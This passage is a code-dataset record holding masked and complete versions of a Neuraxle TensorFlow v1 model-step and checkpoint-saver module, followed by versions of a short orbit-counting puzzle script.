seealso::\n `Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,\n :class:`~neuraxle.base.BaseSaver`\n \"\"\"\n\n def save_step(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext') ->'BaseStep':\n \"\"\"\n Save a step that is using tf.train.Saver().\n :param step: step to save\n :type step: BaseStep\n :param context: execution context to save from\n :type context: ExecutionContext\n :return: saved step\n \"\"\"\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.save(step.session, self._get_saved_model_path(context, step))\n step.strip()\n return step\n\n def load_step(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext') ->'BaseStep':\n \"\"\"\n Load a step that is using tensorflow using tf.train.Saver().\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n step.is_initialized = False\n step.setup(context)\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.restore(step.session, self._get_saved_model_path(context,\n step))\n return step\n\n def can_load(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext'):\n \"\"\"\n Returns whether or not we can load.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n meta_exists = os.path.exists(os.path.join(context.get_path(),\n '{0}.ckpt.meta'.format(step.get_name())))\n index_exists = os.path.exists(os.path.join(context.get_path(),\n '{0}.ckpt.index'.format(step.get_name())))\n return meta_exists and index_exists\n\n def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):\n \"\"\"\n Returns the saved model path using the given execution context, and step name.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n return os.path.join(context.get_path(), '{0}.ckpt'.format(step.\n get_name()))\n",
"step-2": "<mask token>\n\n\nclass TensorflowV1ModelStep(BaseTensorflowModelStep):\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, create_graph, create_loss, create_optimizer,\n create_feed_dict=None, data_inputs_dtype=None,\n expected_outputs_dtype=None, variable_scope=None,\n has_expected_outputs=True, print_loss=False, print_func=None):\n BaseTensorflowModelStep.__init__(self, create_model=create_graph,\n create_loss=create_loss, create_optimizer=create_optimizer,\n create_inputs=create_feed_dict, data_inputs_dtype=\n data_inputs_dtype, expected_outputs_dtype=\n expected_outputs_dtype, step_saver=TensorflowV1StepSaver(),\n print_loss=print_loss, print_func=print_func)\n if variable_scope is None:\n variable_scope = self.name\n self.variable_scope = variable_scope\n self.has_expected_outputs = has_expected_outputs\n self.create_feed_dict = create_feed_dict\n\n def setup(self, context: ExecutionContext) ->BaseStep:\n \"\"\"\n Setup tensorflow 1 graph, and session using a variable scope.\n\n :return: self\n :rtype: BaseStep\n \"\"\"\n if self.is_initialized:\n return self\n self.graph = tf.Graph()\n with self.graph.as_default():\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n self.session = tf.Session(config=tf.ConfigProto(\n log_device_placement=True), graph=self.graph)\n model = self.create_model(self, context)\n if not isinstance(model, tuple):\n tf.identity(model, name='output')\n else:\n tf.identity(model[0], name='output')\n tf.identity(model[1], name='inference_output')\n tf.identity(self.create_loss(self), name='loss')\n self.create_optimizer(self, context).minimize(self['loss'],\n name='optimizer')\n init = tf.global_variables_initializer()\n self.session.run(init)\n self.is_initialized = True\n\n def teardown(self) ->BaseStep:\n \"\"\"\n Close session on teardown.\n\n :return:\n \"\"\"\n if self.session is not None:\n self.session.close()\n self.is_initialized = False\n return self\n\n def strip(self):\n \"\"\"\n Strip tensorflow 1 properties from to step to make the step serializable.\n\n :return: stripped step\n :rtype: BaseStep\n \"\"\"\n self.graph = None\n self.session = None\n return self\n\n def fit(self, data_inputs, expected_outputs=None) ->'BaseStep':\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n return self.fit_model(data_inputs, expected_outputs)\n\n def fit_model(self, data_inputs, expected_outputs=None) ->BaseStep:\n \"\"\"\n Fit tensorflow model using the variable scope.\n\n :param data_inputs: data inputs\n :param expected_outputs: expected outputs to fit on\n :return: fitted self\n :rtype: BaseStep\n \"\"\"\n feed_dict = {self['data_inputs']: data_inputs}\n if self.has_expected_outputs:\n feed_dict.update({self['expected_outputs']: expected_outputs})\n if self.create_inputs is not None:\n additional_feed_dict_arguments = self.create_inputs(self,\n data_inputs, expected_outputs)\n feed_dict.update(additional_feed_dict_arguments)\n results = self.session.run([self['optimizer'], self['loss']],\n feed_dict=feed_dict)\n loss = results[1]\n self.add_new_loss(loss)\n return self\n\n def transform(self, data_inputs, expected_outputs=None) ->'BaseStep':\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n return self.transform_model(data_inputs)\n\n def transform_model(self, data_inputs):\n \"\"\"\n Transform tensorflow model using the variable scope.\n\n :param data_inputs:\n :return:\n \"\"\"\n inference_output_name = self._get_inference_output_name()\n feed_dict = {self['data_inputs']: 
data_inputs}\n results = self.session.run([self[inference_output_name], self[\n 'loss']], feed_dict=feed_dict)\n self.add_new_loss(results[1], test_only=True)\n return results[0]\n <mask token>\n <mask token>\n\n\nclass TensorflowV1StepSaver(BaseSaver):\n \"\"\"\n Step saver for a tensorflow Session using tf.train.Saver().\n It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.\n\n .. seealso::\n `Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,\n :class:`~neuraxle.base.BaseSaver`\n \"\"\"\n\n def save_step(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext') ->'BaseStep':\n \"\"\"\n Save a step that is using tf.train.Saver().\n :param step: step to save\n :type step: BaseStep\n :param context: execution context to save from\n :type context: ExecutionContext\n :return: saved step\n \"\"\"\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.save(step.session, self._get_saved_model_path(context, step))\n step.strip()\n return step\n\n def load_step(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext') ->'BaseStep':\n \"\"\"\n Load a step that is using tensorflow using tf.train.Saver().\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n step.is_initialized = False\n step.setup(context)\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.restore(step.session, self._get_saved_model_path(context,\n step))\n return step\n\n def can_load(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext'):\n \"\"\"\n Returns whether or not we can load.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n meta_exists = os.path.exists(os.path.join(context.get_path(),\n '{0}.ckpt.meta'.format(step.get_name())))\n index_exists = os.path.exists(os.path.join(context.get_path(),\n '{0}.ckpt.index'.format(step.get_name())))\n return meta_exists and index_exists\n\n def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):\n \"\"\"\n Returns the saved model path using the given execution context, and step name.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n return os.path.join(context.get_path(), '{0}.ckpt'.format(step.\n get_name()))\n",
"step-3": "<mask token>\n\n\nclass TensorflowV1ModelStep(BaseTensorflowModelStep):\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, create_graph, create_loss, create_optimizer,\n create_feed_dict=None, data_inputs_dtype=None,\n expected_outputs_dtype=None, variable_scope=None,\n has_expected_outputs=True, print_loss=False, print_func=None):\n BaseTensorflowModelStep.__init__(self, create_model=create_graph,\n create_loss=create_loss, create_optimizer=create_optimizer,\n create_inputs=create_feed_dict, data_inputs_dtype=\n data_inputs_dtype, expected_outputs_dtype=\n expected_outputs_dtype, step_saver=TensorflowV1StepSaver(),\n print_loss=print_loss, print_func=print_func)\n if variable_scope is None:\n variable_scope = self.name\n self.variable_scope = variable_scope\n self.has_expected_outputs = has_expected_outputs\n self.create_feed_dict = create_feed_dict\n\n def setup(self, context: ExecutionContext) ->BaseStep:\n \"\"\"\n Setup tensorflow 1 graph, and session using a variable scope.\n\n :return: self\n :rtype: BaseStep\n \"\"\"\n if self.is_initialized:\n return self\n self.graph = tf.Graph()\n with self.graph.as_default():\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n self.session = tf.Session(config=tf.ConfigProto(\n log_device_placement=True), graph=self.graph)\n model = self.create_model(self, context)\n if not isinstance(model, tuple):\n tf.identity(model, name='output')\n else:\n tf.identity(model[0], name='output')\n tf.identity(model[1], name='inference_output')\n tf.identity(self.create_loss(self), name='loss')\n self.create_optimizer(self, context).minimize(self['loss'],\n name='optimizer')\n init = tf.global_variables_initializer()\n self.session.run(init)\n self.is_initialized = True\n\n def teardown(self) ->BaseStep:\n \"\"\"\n Close session on teardown.\n\n :return:\n \"\"\"\n if self.session is not None:\n self.session.close()\n self.is_initialized = False\n return self\n\n def strip(self):\n \"\"\"\n Strip tensorflow 1 properties from to step to make the step serializable.\n\n :return: stripped step\n :rtype: BaseStep\n \"\"\"\n self.graph = None\n self.session = None\n return self\n\n def fit(self, data_inputs, expected_outputs=None) ->'BaseStep':\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n return self.fit_model(data_inputs, expected_outputs)\n\n def fit_model(self, data_inputs, expected_outputs=None) ->BaseStep:\n \"\"\"\n Fit tensorflow model using the variable scope.\n\n :param data_inputs: data inputs\n :param expected_outputs: expected outputs to fit on\n :return: fitted self\n :rtype: BaseStep\n \"\"\"\n feed_dict = {self['data_inputs']: data_inputs}\n if self.has_expected_outputs:\n feed_dict.update({self['expected_outputs']: expected_outputs})\n if self.create_inputs is not None:\n additional_feed_dict_arguments = self.create_inputs(self,\n data_inputs, expected_outputs)\n feed_dict.update(additional_feed_dict_arguments)\n results = self.session.run([self['optimizer'], self['loss']],\n feed_dict=feed_dict)\n loss = results[1]\n self.add_new_loss(loss)\n return self\n\n def transform(self, data_inputs, expected_outputs=None) ->'BaseStep':\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n return self.transform_model(data_inputs)\n\n def transform_model(self, data_inputs):\n \"\"\"\n Transform tensorflow model using the variable scope.\n\n :param data_inputs:\n :return:\n \"\"\"\n inference_output_name = self._get_inference_output_name()\n feed_dict = {self['data_inputs']: 
data_inputs}\n results = self.session.run([self[inference_output_name], self[\n 'loss']], feed_dict=feed_dict)\n self.add_new_loss(results[1], test_only=True)\n return results[0]\n\n def _get_inference_output_name(self):\n \"\"\"\n Return the output tensor name for inference (transform).\n In create_graph, the user can return a tuple of two elements : the output tensor for training, and the output tensor for inference.\n\n :return:\n \"\"\"\n inference_output_name = 'output'\n if len(self['inference_output'].get_shape().as_list()) > 0:\n inference_output_name = 'inference_output'\n return inference_output_name\n <mask token>\n\n\nclass TensorflowV1StepSaver(BaseSaver):\n \"\"\"\n Step saver for a tensorflow Session using tf.train.Saver().\n It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.\n\n .. seealso::\n `Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,\n :class:`~neuraxle.base.BaseSaver`\n \"\"\"\n\n def save_step(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext') ->'BaseStep':\n \"\"\"\n Save a step that is using tf.train.Saver().\n :param step: step to save\n :type step: BaseStep\n :param context: execution context to save from\n :type context: ExecutionContext\n :return: saved step\n \"\"\"\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.save(step.session, self._get_saved_model_path(context, step))\n step.strip()\n return step\n\n def load_step(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext') ->'BaseStep':\n \"\"\"\n Load a step that is using tensorflow using tf.train.Saver().\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n step.is_initialized = False\n step.setup(context)\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.restore(step.session, self._get_saved_model_path(context,\n step))\n return step\n\n def can_load(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext'):\n \"\"\"\n Returns whether or not we can load.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n meta_exists = os.path.exists(os.path.join(context.get_path(),\n '{0}.ckpt.meta'.format(step.get_name())))\n index_exists = os.path.exists(os.path.join(context.get_path(),\n '{0}.ckpt.index'.format(step.get_name())))\n return meta_exists and index_exists\n\n def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):\n \"\"\"\n Returns the saved model path using the given execution context, and step name.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n return os.path.join(context.get_path(), '{0}.ckpt'.format(step.\n get_name()))\n",
"step-4": "<mask token>\n\n\nclass TensorflowV1ModelStep(BaseTensorflowModelStep):\n \"\"\"\n Base class for tensorflow 1 steps.\n It uses :class:`TensorflowV1StepSaver` for saving the model.\n\n .. seealso::\n `Using the saved model format <https://www.tensorflow.org/guide/checkpoint>`_,\n :class:`~neuraxle.base.BaseStep`\n \"\"\"\n HYPERPARAMS = HyperparameterSamples({})\n HYPERPARAMS_SPACE = HyperparameterSpace({})\n\n def __init__(self, create_graph, create_loss, create_optimizer,\n create_feed_dict=None, data_inputs_dtype=None,\n expected_outputs_dtype=None, variable_scope=None,\n has_expected_outputs=True, print_loss=False, print_func=None):\n BaseTensorflowModelStep.__init__(self, create_model=create_graph,\n create_loss=create_loss, create_optimizer=create_optimizer,\n create_inputs=create_feed_dict, data_inputs_dtype=\n data_inputs_dtype, expected_outputs_dtype=\n expected_outputs_dtype, step_saver=TensorflowV1StepSaver(),\n print_loss=print_loss, print_func=print_func)\n if variable_scope is None:\n variable_scope = self.name\n self.variable_scope = variable_scope\n self.has_expected_outputs = has_expected_outputs\n self.create_feed_dict = create_feed_dict\n\n def setup(self, context: ExecutionContext) ->BaseStep:\n \"\"\"\n Setup tensorflow 1 graph, and session using a variable scope.\n\n :return: self\n :rtype: BaseStep\n \"\"\"\n if self.is_initialized:\n return self\n self.graph = tf.Graph()\n with self.graph.as_default():\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n self.session = tf.Session(config=tf.ConfigProto(\n log_device_placement=True), graph=self.graph)\n model = self.create_model(self, context)\n if not isinstance(model, tuple):\n tf.identity(model, name='output')\n else:\n tf.identity(model[0], name='output')\n tf.identity(model[1], name='inference_output')\n tf.identity(self.create_loss(self), name='loss')\n self.create_optimizer(self, context).minimize(self['loss'],\n name='optimizer')\n init = tf.global_variables_initializer()\n self.session.run(init)\n self.is_initialized = True\n\n def teardown(self) ->BaseStep:\n \"\"\"\n Close session on teardown.\n\n :return:\n \"\"\"\n if self.session is not None:\n self.session.close()\n self.is_initialized = False\n return self\n\n def strip(self):\n \"\"\"\n Strip tensorflow 1 properties from to step to make the step serializable.\n\n :return: stripped step\n :rtype: BaseStep\n \"\"\"\n self.graph = None\n self.session = None\n return self\n\n def fit(self, data_inputs, expected_outputs=None) ->'BaseStep':\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n return self.fit_model(data_inputs, expected_outputs)\n\n def fit_model(self, data_inputs, expected_outputs=None) ->BaseStep:\n \"\"\"\n Fit tensorflow model using the variable scope.\n\n :param data_inputs: data inputs\n :param expected_outputs: expected outputs to fit on\n :return: fitted self\n :rtype: BaseStep\n \"\"\"\n feed_dict = {self['data_inputs']: data_inputs}\n if self.has_expected_outputs:\n feed_dict.update({self['expected_outputs']: expected_outputs})\n if self.create_inputs is not None:\n additional_feed_dict_arguments = self.create_inputs(self,\n data_inputs, expected_outputs)\n feed_dict.update(additional_feed_dict_arguments)\n results = self.session.run([self['optimizer'], self['loss']],\n feed_dict=feed_dict)\n loss = results[1]\n self.add_new_loss(loss)\n return self\n\n def transform(self, data_inputs, expected_outputs=None) ->'BaseStep':\n with tf.variable_scope(self.variable_scope, 
reuse=tf.AUTO_REUSE):\n return self.transform_model(data_inputs)\n\n def transform_model(self, data_inputs):\n \"\"\"\n Transform tensorflow model using the variable scope.\n\n :param data_inputs:\n :return:\n \"\"\"\n inference_output_name = self._get_inference_output_name()\n feed_dict = {self['data_inputs']: data_inputs}\n results = self.session.run([self[inference_output_name], self[\n 'loss']], feed_dict=feed_dict)\n self.add_new_loss(results[1], test_only=True)\n return results[0]\n\n def _get_inference_output_name(self):\n \"\"\"\n Return the output tensor name for inference (transform).\n In create_graph, the user can return a tuple of two elements : the output tensor for training, and the output tensor for inference.\n\n :return:\n \"\"\"\n inference_output_name = 'output'\n if len(self['inference_output'].get_shape().as_list()) > 0:\n inference_output_name = 'inference_output'\n return inference_output_name\n\n def __getitem__(self, item):\n \"\"\"\n Get a graph tensor by name using get item.\n\n :param item: tensor name\n :type item: str\n\n :return: tensor\n :rtype: tf.Tensor\n \"\"\"\n if ':' in item:\n split = item.split(':')\n tensor_name = split[0]\n device = split[1]\n else:\n tensor_name = item\n device = '0'\n try:\n result = self.graph.get_tensor_by_name('{0}/{1}:{2}'.format(\n self.variable_scope, tensor_name, device))\n except KeyError:\n result = None\n if result is None:\n try:\n result = self.graph.get_operation_by_name('{0}/{1}'.format(\n self.variable_scope, tensor_name))\n except KeyError:\n result = tf.get_variable(tensor_name, [])\n return result\n\n\nclass TensorflowV1StepSaver(BaseSaver):\n \"\"\"\n Step saver for a tensorflow Session using tf.train.Saver().\n It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.\n\n .. 
seealso::\n `Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,\n :class:`~neuraxle.base.BaseSaver`\n \"\"\"\n\n def save_step(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext') ->'BaseStep':\n \"\"\"\n Save a step that is using tf.train.Saver().\n :param step: step to save\n :type step: BaseStep\n :param context: execution context to save from\n :type context: ExecutionContext\n :return: saved step\n \"\"\"\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.save(step.session, self._get_saved_model_path(context, step))\n step.strip()\n return step\n\n def load_step(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext') ->'BaseStep':\n \"\"\"\n Load a step that is using tensorflow using tf.train.Saver().\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n step.is_initialized = False\n step.setup(context)\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.restore(step.session, self._get_saved_model_path(context,\n step))\n return step\n\n def can_load(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext'):\n \"\"\"\n Returns whether or not we can load.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n meta_exists = os.path.exists(os.path.join(context.get_path(),\n '{0}.ckpt.meta'.format(step.get_name())))\n index_exists = os.path.exists(os.path.join(context.get_path(),\n '{0}.ckpt.index'.format(step.get_name())))\n return meta_exists and index_exists\n\n def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):\n \"\"\"\n Returns the saved model path using the given execution context, and step name.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n return os.path.join(context.get_path(), '{0}.ckpt'.format(step.\n get_name()))\n",
"step-5": "\"\"\"\nNeuraxle Tensorflow V1 Utility classes\n=========================================\nNeuraxle utility classes for tensorflow v1.\n\n..\n Copyright 2019, Neuraxio Inc.\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n http://www.apache.org/licenses/LICENSE-2.0\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\n\"\"\"\nimport os\n\nimport tensorflow as tf\nfrom neuraxle.base import BaseSaver, BaseStep, ExecutionContext\nfrom neuraxle.hyperparams.space import HyperparameterSamples, HyperparameterSpace\n\nfrom neuraxle_tensorflow.tensorflow import BaseTensorflowModelStep\n\n\nclass TensorflowV1ModelStep(BaseTensorflowModelStep):\n \"\"\"\n Base class for tensorflow 1 steps.\n It uses :class:`TensorflowV1StepSaver` for saving the model.\n\n .. seealso::\n `Using the saved model format <https://www.tensorflow.org/guide/checkpoint>`_,\n :class:`~neuraxle.base.BaseStep`\n \"\"\"\n HYPERPARAMS = HyperparameterSamples({})\n HYPERPARAMS_SPACE = HyperparameterSpace({})\n\n def __init__(\n self,\n create_graph,\n create_loss,\n create_optimizer,\n create_feed_dict=None,\n data_inputs_dtype=None,\n expected_outputs_dtype=None,\n variable_scope=None,\n has_expected_outputs=True,\n print_loss=False,\n print_func=None\n ):\n BaseTensorflowModelStep.__init__(\n self,\n create_model=create_graph,\n create_loss=create_loss,\n create_optimizer=create_optimizer,\n create_inputs=create_feed_dict,\n data_inputs_dtype=data_inputs_dtype,\n expected_outputs_dtype=expected_outputs_dtype,\n step_saver=TensorflowV1StepSaver(),\n print_loss=print_loss,\n print_func=print_func\n )\n\n if variable_scope is None:\n variable_scope = self.name\n self.variable_scope = variable_scope\n self.has_expected_outputs = has_expected_outputs\n self.create_feed_dict = create_feed_dict\n\n def setup(self, context: ExecutionContext) -> BaseStep:\n \"\"\"\n Setup tensorflow 1 graph, and session using a variable scope.\n\n :return: self\n :rtype: BaseStep\n \"\"\"\n if self.is_initialized:\n return self\n\n self.graph = tf.Graph()\n with self.graph.as_default():\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n self.session = tf.Session(config=tf.ConfigProto(log_device_placement=True), graph=self.graph)\n\n model = self.create_model(self, context)\n if not isinstance(model, tuple):\n tf.identity(model, name='output')\n else:\n tf.identity(model[0], name='output')\n tf.identity(model[1], name='inference_output')\n\n tf.identity(self.create_loss(self), name='loss')\n self.create_optimizer(self, context).minimize(self['loss'], name='optimizer')\n\n init = tf.global_variables_initializer()\n self.session.run(init)\n self.is_initialized = True\n\n def teardown(self) -> BaseStep:\n \"\"\"\n Close session on teardown.\n\n :return:\n \"\"\"\n if self.session is not None:\n self.session.close()\n self.is_initialized = False\n\n return self\n\n def strip(self):\n \"\"\"\n Strip tensorflow 1 properties from to step to make the step serializable.\n\n :return: stripped step\n :rtype: BaseStep\n \"\"\"\n self.graph = None\n self.session = None\n\n return self\n\n def fit(self, data_inputs, expected_outputs=None) -> 
'BaseStep':\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n return self.fit_model(data_inputs, expected_outputs)\n\n def fit_model(self, data_inputs, expected_outputs=None) -> BaseStep:\n \"\"\"\n Fit tensorflow model using the variable scope.\n\n :param data_inputs: data inputs\n :param expected_outputs: expected outputs to fit on\n :return: fitted self\n :rtype: BaseStep\n \"\"\"\n feed_dict = {\n self['data_inputs']: data_inputs\n }\n\n if self.has_expected_outputs:\n feed_dict.update({\n self['expected_outputs']: expected_outputs\n })\n\n if self.create_inputs is not None:\n additional_feed_dict_arguments = self.create_inputs(self, data_inputs, expected_outputs)\n feed_dict.update(additional_feed_dict_arguments)\n\n results = self.session.run([self['optimizer'], self['loss']], feed_dict=feed_dict)\n\n loss = results[1]\n self.add_new_loss(loss)\n\n return self\n\n def transform(self, data_inputs, expected_outputs=None) -> 'BaseStep':\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n return self.transform_model(data_inputs)\n\n def transform_model(self, data_inputs):\n \"\"\"\n Transform tensorflow model using the variable scope.\n\n :param data_inputs:\n :return:\n \"\"\"\n inference_output_name = self._get_inference_output_name()\n\n feed_dict = {\n self['data_inputs']: data_inputs\n }\n\n results = self.session.run([self[inference_output_name], self['loss']], feed_dict=feed_dict)\n self.add_new_loss(results[1], test_only=True)\n\n return results[0]\n\n def _get_inference_output_name(self):\n \"\"\"\n Return the output tensor name for inference (transform).\n In create_graph, the user can return a tuple of two elements : the output tensor for training, and the output tensor for inference.\n\n :return:\n \"\"\"\n inference_output_name = 'output'\n if len(self['inference_output'].get_shape().as_list()) > 0:\n inference_output_name = 'inference_output'\n\n return inference_output_name\n\n def __getitem__(self, item):\n \"\"\"\n Get a graph tensor by name using get item.\n\n :param item: tensor name\n :type item: str\n\n :return: tensor\n :rtype: tf.Tensor\n \"\"\"\n if \":\" in item:\n split = item.split(\":\")\n tensor_name = split[0]\n device = split[1]\n else:\n tensor_name = item\n device = \"0\"\n\n try:\n result = self.graph.get_tensor_by_name(\"{0}/{1}:{2}\".format(self.variable_scope, tensor_name, device))\n except KeyError:\n result = None\n\n if result is None:\n try:\n result = self.graph.get_operation_by_name(\"{0}/{1}\".format(self.variable_scope, tensor_name))\n except KeyError:\n result = tf.get_variable(tensor_name, [])\n\n return result\n\n\nclass TensorflowV1StepSaver(BaseSaver):\n \"\"\"\n Step saver for a tensorflow Session using tf.train.Saver().\n It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.\n\n .. 
seealso::\n `Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,\n :class:`~neuraxle.base.BaseSaver`\n \"\"\"\n\n def save_step(self, step: 'TensorflowV1ModelStep', context: 'ExecutionContext') -> 'BaseStep':\n \"\"\"\n Save a step that is using tf.train.Saver().\n :param step: step to save\n :type step: BaseStep\n :param context: execution context to save from\n :type context: ExecutionContext\n :return: saved step\n \"\"\"\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.save(step.session, self._get_saved_model_path(context, step))\n step.strip()\n\n return step\n\n def load_step(self, step: 'TensorflowV1ModelStep', context: 'ExecutionContext') -> 'BaseStep':\n \"\"\"\n Load a step that is using tensorflow using tf.train.Saver().\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n step.is_initialized = False\n step.setup(context)\n\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.restore(step.session, self._get_saved_model_path(context, step))\n\n return step\n\n def can_load(self, step: 'TensorflowV1ModelStep', context: 'ExecutionContext'):\n \"\"\"\n Returns whether or not we can load.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n meta_exists = os.path.exists(os.path.join(context.get_path(), \"{0}.ckpt.meta\".format(step.get_name())))\n index_exists = os.path.exists(os.path.join(context.get_path(), \"{0}.ckpt.index\".format(step.get_name())))\n\n return meta_exists and index_exists\n\n def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):\n \"\"\"\n Returns the saved model path using the given execution context, and step name.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n return os.path.join(context.get_path(), \"{0}.ckpt\".format(step.get_name()))\n",
"step-ids": [
13,
15,
16,
19,
21
]
}
|
[
13,
15,
16,
19,
21
] |
<|reserved_special_token_0|>
class Obj:
def __init__(self, name):
self.name = name
self.down = []
def add_child(self, obj):
self.down.append(obj)
def prnt(self, prev):
if not self.down:
print(prev + '=' + self.name)
else:
for d in self.down:
d.prnt(prev + '-' + self.name)
def distance(self, start):
d = start
if not self.down:
print(self.name, start)
for n in self.down:
d += n.distance(start + 1)
return d
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Obj:
def __init__(self, name):
self.name = name
self.down = []
def add_child(self, obj):
self.down.append(obj)
def prnt(self, prev):
if not self.down:
print(prev + '=' + self.name)
else:
for d in self.down:
d.prnt(prev + '-' + self.name)
def distance(self, start):
d = start
if not self.down:
print(self.name, start)
for n in self.down:
d += n.distance(start + 1)
return d
<|reserved_special_token_0|>
for c, o in effects:
obj = None
if o in orbits:
obj = orbits[o]
else:
obj = Obj(o)
orbits[o] = obj
if c in orbits:
orbits[c].add_child(obj)
else:
ctr = Obj(c)
ctr.add_child(obj)
orbits[c] = ctr
print(COM.distance(0))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Obj:
def __init__(self, name):
self.name = name
self.down = []
def add_child(self, obj):
self.down.append(obj)
def prnt(self, prev):
if not self.down:
print(prev + '=' + self.name)
else:
for d in self.down:
d.prnt(prev + '-' + self.name)
def distance(self, start):
d = start
if not self.down:
print(self.name, start)
for n in self.down:
d += n.distance(start + 1)
return d
COM = Obj('COM')
orbits = {}
orbits['COM'] = COM
effects = [x.strip().split(')') for x in list(sys.stdin)]
for c, o in effects:
obj = None
if o in orbits:
obj = orbits[o]
else:
obj = Obj(o)
orbits[o] = obj
if c in orbits:
orbits[c].add_child(obj)
else:
ctr = Obj(c)
ctr.add_child(obj)
orbits[c] = ctr
print(COM.distance(0))
<|reserved_special_token_1|>
import sys
class Obj:
def __init__(self, name):
self.name = name
self.down = []
def add_child(self, obj):
self.down.append(obj)
def prnt(self, prev):
if not self.down:
print(prev + '=' + self.name)
else:
for d in self.down:
d.prnt(prev + '-' + self.name)
def distance(self, start):
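        # Summing every node's depth gives the total orbit count: a node at
        # depth k orbits each of its k ancestors, directly or indirectly.
        # (The print on leaf nodes is leftover debug output.)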
d = start
if not self.down:
print(self.name, start)
for n in self.down:
d += n.distance(start + 1)
return d
COM = Obj('COM')
orbits = {}
orbits['COM'] = COM
effects = [x.strip().split(')') for x in list(sys.stdin)]
for c, o in effects:
obj = None
if o in orbits:
obj = orbits[o]
else:
obj = Obj(o)
orbits[o] = obj
if c in orbits:
orbits[c].add_child(obj)
else:
ctr = Obj(c)
ctr.add_child(obj)
orbits[c] = ctr
print(COM.distance(0))
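# Input (stdin) is Advent of Code 2019 day 6 style: one "PARENT)CHILD" pair per
# line, e.g. "COM)B"; the program prints the total of direct + indirect orbits.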
|
flexible
|
{
"blob_id": "7d3f4e0a5031f9ce618c568b440c7425489060a1",
"index": 4122,
